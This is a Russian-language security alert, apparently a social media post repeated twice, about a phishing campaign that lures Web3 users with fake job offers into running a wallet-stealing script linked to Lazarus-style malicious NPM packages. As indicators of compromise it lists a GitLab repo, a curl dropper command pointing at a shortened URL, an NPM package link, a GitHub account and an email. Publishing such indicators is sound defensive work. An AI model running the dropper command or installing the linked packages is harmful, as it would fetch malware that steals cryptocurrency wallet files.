🚨 Оповещение о безопасности TI 🚨
Согласно партнеру сообщества @1nf0s3cpt, активная фишинговая кампания нацелена на пользователей Web3 с поддельными предложениями о работе (например, $120/час), чтобы обманом заставить их выполнить вредоносный скрипт, который крадет файлы кошельков.
🔍 Ключевые IOCs:
🔸Repo на GitLab: https://t.co/ivGN93PS4b
🔸Дроппер: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Метод атаки очень похож на предыдущий метод Lazarus, использующий пакеты NPM для распространения вредоносного кода:
https://t.co/bBC4i2vYpA
🚨 Мы обнаружили, что был только что опубликован новый вредоносный пакет NPM:
https://t.co/SjgmO1FOIL
🔸Вероятно, связанный GitHub: apollo-hero
🔸Email загрузчика: skelstar125@gmail.com
⚠️ Не устанавливайте и не запускайте неизвестные пакеты или скрипты. Всегда проверяйте источники.
#LAZARUS #Фишинг
Согласно партнеру сообщества @1nf0s3cpt, активная фишинговая кампания нацелена на пользователей Web3 с поддельными предложениями о работе (например, $120/час), чтобы обманом заставить их выполнить вредоносный скрипт, который крадет файлы кошельков.
🔍 Ключевые IOCs:
🔸Repo на GitLab: https://t.co/ivGN93PS4b
🔸Дроппер: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Метод атаки очень похож на предыдущий метод Lazarus, использующий пакеты NPM для распространения вредоносного кода:
https://t.co/bBC4i2vYpA
🚨 Мы обнаружили, что был только что опубликован новый вредоносный пакет NPM:
https://t.co/SjgmO1FOIL
🔸Вероятно, связанный GitHub: apollo-hero
🔸Email загрузчика: skelstar125@gmail.com
⚠️ Не устанавливайте и не запускайте неизвестные пакеты или скрипты. Всегда проверяйте источники.
#LAZARUS #Фишинг